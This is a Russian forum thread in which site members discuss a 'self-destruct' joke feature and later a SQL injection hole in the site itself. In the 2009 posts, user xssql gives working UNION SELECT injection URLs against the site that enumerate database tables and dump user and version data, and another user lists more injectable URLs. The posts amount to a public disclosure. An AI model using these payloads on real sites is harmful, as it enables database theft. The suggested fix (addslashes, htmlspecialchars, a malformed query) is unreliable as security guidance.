Об автохрокинге

← К списку тем раздела «Гостевая»

fornit 20.05.2003 19:29
Наконец дотянулись руки доделать систему автохрюкинга :)
Идея запатентована :)
Теперь каждый желающий может грохнуть этот сайт одним из двух предлагаемых способов. Если, к примеру, мама-папа-муж-жена не желает, чтобы сынок-дочка-жена-муж лазили здесь, достаточно хрюкнуть этот сайт, и любознательное существо останется без запретного яблока :)
Мера своевременная, потому как самое интересное здесь еще впереди.
Светлана 20.05.2003 20:40
Николай :)
И что же это за способы? 8) И зачем хрюкать сайт, когда он еще толком-то и не раскручен? :)
Светлана 20.05.2003 21:06
Второй вопрос снимается с повестки дня. :D... Я слишком, иногда, тороплюсь с нажатием кнопки "Отправить" :)
nan 20.05.2003 21:57
Можно не бояться зайти на саму страничку автохрюкинга. Процесс пойдет только после нажатия одной из двух кнопок.
Светлана 20.05.2003 22:42
Перспектива процесса автохрюкинга очень заманчива :) А восстановлению сайт подлежит после нажатия одной из кнопок? :)
Namor 22.05.2003 01:12
Опять меня стёрли. :'(
Администрация, я буду жаловаться!

Хрюкинг - клёвая штука. Хочу себе такую-же на сайт, и обращаюсь с официальным запросом к корпорации Fornitsoft о возможности лицензирования этой технологии.

Я сначала думал что это такой способ отстрела неугодных юзеров (типа меня). А оказывается это способ суицида для них ???

Ну, в общем, хочу патент :)
nan 22.05.2003 08:57
Я тебя не стирал!!! Ты так и торчишь от 22 марта в регистрации Roman-ом! Пароль забыл? Могу напомнить, если хочешь в письме!
Насчет использования хрюкинга у тебя на сайте – никаких возражений. А нельзя ли попросить тебя в ответ сделать статейку для этого сайта о флеше в смысле программирования и т.д.?
Ласточка 24.05.2003 22:41
Ну. товарищ Nan! И садист же ты! ;D Это я по поводу твоей системы автохрюка - способа повышения адреналина в крови на 5 минут для всех излишне любопытствующих 8) ;D
nan 09.06.2009 14:45

дешевая инъекция.. Нужно еще немало знать, чтобы навредить. Хотя бы именя таблиц. Ну а если кто-то сильно навредит, то в логах по его ip обращусь к провайдеру, найду голубчика о будет он сильно горевать в итоге. А сайт быстро восстановлю. Дырки всегда можно найти. Люди ходят по улице без шлемов и любой может кирпичем ударить.

А пароль шифрованный :)

Короче, каждый сам решает преступник он или нет. Воры, к примеру, в точности как хакеры, гордятся своим умением потрошить лохов. Хакер - ничем не лучше вора.

Но спасибо, исправил защиту...

xssql 09.06.2009 15:24
ух как срашно )) давай, юзай, айпиха есть, я даже не через проксю юзал индж ))


http://www.scorcher.ru/subject_index/subject_show.php?id=-4249/**/UNION/**/SELECT/**/0,concat_Ws(0x0b,table_name,column_name),2,3,4,5,6,7,8,9+FROM+INFORMATION_SCHEMA.COLUMNS+LIMIT+0,1

Перебирай лимитом все свои таблицы ))

хотел бы навредить, поверь уже давно это сделал бы и тем более для тебя не кинул бы чтобы ты её латал ))

"дешевая инъекция"
а какая еще есть не дешевая индж?

http://www.scorcher.ru/subject_index/subject_show.php?id=-4249/**/UnION/**/SELECT/**/0,concat_Ws(0x0b,user(),version(),database()),2,3,4,5,6,7,8,9


чел то что ты фильтр кинул тебе не поможет ))

Надо сделать следующее

if !is_numeric($_POST['id']) die('fuck off');


также когда не цифровое значение

$id=addslashes($id);
$id=htmlspecialchars($id);
mysql_query(SELECT * FROM WHERE myid='$id');

обьязательно в запросах ставь ' и слешируй ;) удачи
nan 09.06.2009 15:44

все, сибо еще разок :) а че ты такой агрессивный?

 

xssql 09.06.2009 18:56
с чего ты взял что я агрессивный )) я споконый как доска )) лан, кильни мой акк с сайта чтобы на мыло мессаги не приходили и проверь все переменные ;)
xssql 09.06.2009 18:58
в этой теме ввел что надо тож есть баги, исправляй, подставляй ' там где цифры, буш баги видеть
Айк 09.06.2009 19:15
Туда же

http://scorcher.ru/journal/show_news.php?id='
http://scorcher.ru/forum/index.php?board=7&action=display&threadid='&start=30

Как вариант, есть проги вроде xspider. Можно поставить копию сайта на локальную виртуальную машину и проверить с помощью сканера.

Для функции mysql_query можно написать функцию обёртки, которая бы фильтровала запросы к БД и одновременно делала лог запросов, которые вызвали ошибку. Это самый простой, хоть и самый ненадёжный способ.

Вторая вариация дубовых способов: фильтровать все GET/POST запросы на моменте первого обращения к PHP коду. Поскольку переменных, которые изменяются извне не так уж много, написать такой фильтр несложно и достаточно вставить его в одном месте, например config.php (setting.php) файле, лишь бы этот файл обязательно подключался к скриптам в самом начале.

О дырах форума можно подробнее узнать по ссылке:

securityvulns.ru

В поиске ввести: "Yabb SE SQL Injection" или "Yabb SE exploit", "Yabb SE xss"

Дабы не своровали FTP пароли, пока будешь лазить по таким сайтам, нужно установить Avira ( http://free-av.com ) и усердно молится :)
oleg89 10.06.2009 01:34
удивляюсь нану - успевает и машеников разоблачать и хацкеров!
и все один! помог бы кто, только обижают... он и так ради нас балбесов старается!
Айк 10.06.2009 15:59
На самом деле современная версия этого движка ( YaBB SE ==> SMF ) куда более устойчива ко взлому. Такого рода проблем там нет.
nan 10.06.2009 17:41

Спасибо всем поучаствовавшим и посочувствовавшим :)

форум написан с нуля, в нем нет ничего от Yabb кроме намеков :) только движок расширенного редактора - не мой.

xssql 10.06.2009 18:38
"удивляюсь нану - успевает и машеников разоблачать и хацкеров"

я думаю если бы я индж не выложил врядли бы он узнал ;)
oleg89 10.06.2009 19:00
я думаю если бы я индж не выложил врядли бы он узнал ;)


не узнал бы, и в чем прикол?

Вообще не вижу смысла ломать этот сайт. Он даже толком не раскручен...